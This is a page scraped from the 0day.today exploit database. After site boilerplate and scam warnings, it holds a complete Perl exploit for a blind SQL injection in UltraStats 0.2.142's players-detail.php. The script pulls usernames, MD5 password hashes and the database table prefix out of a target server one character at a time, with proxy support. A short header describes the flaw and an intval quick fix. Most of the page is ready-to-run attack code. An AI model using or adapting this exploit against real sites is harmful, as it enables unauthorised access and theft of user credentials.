0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit
====================================================================== Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit ====================================================================== #!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; # # [!] Discovered.: DNX # [!] Vendor.....: http://www.ultrastats.org # [!] Detected...: 29.06.2008 # [!] Reported...: 04.07.2008 # [!] Response...: xx.xx.2008 # # [!] Background.: UltraStats is a very flexable log analyzing tool for Call of Duty 2 Server logfiles. # It is able to parse and consolidate the information it can gather from these logs, # and put them into a MySQL Database with a very efficient and high optimiced database # layout. # # [!] Bug........: $_GET['id'] in players-detail.php near line 52 # # 36: if ( isset($_GET['id']) ) # 37: { # 38: // get and check # 39: $content['playerguid'] = DB_RemoveBadChars($_GET['id']); # # 52: $sqlquery = "SELECT " . # 53: "sum( " .STATS_ALIASES . ".Count) as Count, " . # 54: STATS_ALIASES . ".Alias as Aliases_Alias, " . # 55: STATS_ALIASES . ".AliasAsHtml as Aliases_AliasAsHtml" . # 56: " FROM " . STATS_ALIASES . # 57: " WHERE PLAYERID = " . $content['playerguid'] . " " . # 58: GetCustomServerWhereQuery(STATS_ALIASES, false) . # 59: " GROUP BY " . STATS_ALIASES . ".Alias " . # 60: " ORDER BY Count DESC"; # # [!] Tested on..: v0.2.136, v0.2.142 # # [!] Solution...: no update from vendor till now # # [!] Quick fix..: in players-detail.php line 39: # # - replace: # $content['playerguid'] = DB_RemoveBadChars($_GET['id']); # # - with: # $content['playerguid'] = intval(DB_RemoveBadChars($_GET['id'])); # if(!$ARGV[1]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n --------------------------oOO---(_)---OOo--------------------------"; print "\n | Ultrastats <= v0.2.142 (players-detail.php) Blind SQL Injection |"; print "\n | coded by DNX |"; print "\n ------------------------------------------------------------------"; print "\n[!] Usage: perl ultrastats.pl [Host] [Path] <Options>"; print "\n[!] Example: perl ultrastats.pl 127.0.0.1 /ultrastats/ -o 2 -i 123 -l 2 -t users"; print "\n[!] Options:"; print "\n -o [no] 1 = username (default)"; print "\n 2 = password"; print "\n 3 = find database prefix (error based)"; print "\n -i [no] Valid GUID, default is 1"; print "\n -l [no] Limitation in sql query, -l 0 shows the first row,"; print "\n -l 1 the second one and so on, default is 0"; print "\n -t [name] Changed the user table name, default is stats_users"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $target = "username"; my $user = 1; my $limit = 0; my $table = "stats_users"; my %options = (); GetOptions(\%options, "o=i", "i=i", "l=i", "t=s", "p=s"); print "[!] Exploiting...\n"; if($options{"i"}) { $user = $options{"i"}; } if($options{"l"}) { $limit = $options{"l"}; } if($options{"t"}) { $table = $options{"t"}; } if($options{"o"} == 1) { $target = "username"; get_username(); } elsif($options{"o"} == 2) { $target = "password"; get_password(); } elsif($options{"o"} == 3) { get_prefix(); } sub get_username() { syswrite(STDOUT, "[!] Username: ", 14); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 48; while(!$found && $h <= 57) { if(istrue2($host, $path, $table, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$found) { $h = 64; while(!$found && $h <= 122) { if(istrue2($host, $path, $table, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } } sub get_password() { syswrite(STDOUT, "[!] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 48; while(!$found && $h <= 57) { if(istrue2($host, $path, $table, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$found) { $h = 97; while(!$found && $h <= 102) { if(istrue2($host, $path, $table, $i, $h)) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } } sub get_prefix() { my $ua = LWP::UserAgent->new; my $url = "http://".$host.$path."players-detail.php?id=".$user."'"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $response = $ua->get($url); my $content = $response->content; $content =~ /^Database error: Invalid SQL: SELECT sum\( (.*?)_aliases.Count\) as Count,/; print "[!] Prefix: ".$1; } print "\n[!] Exploit done\n"; sub istrue2 { my $host = shift; my $path = shift; my $table = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $url = "http://".$host.$path."players-detail.php?id=".$user."%20AND%20SUBSTRING((SELECT%20".$target."%20FROM%20".$table."%20LIMIT%20".$limit.",1),".$i.",1)=CHAR(".$h.")"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } my $response = $ua->get($url); my $content = $response->content; my $regexp = "Top Hitlocations where you got killed by others"; my $regexp2 = "Meist genutzte Aliases"; if($content =~ /$regexp/ || $content =~ /$regexp2/) { return 1; } else { return 0; } } # 0day.today [2024-12-25] #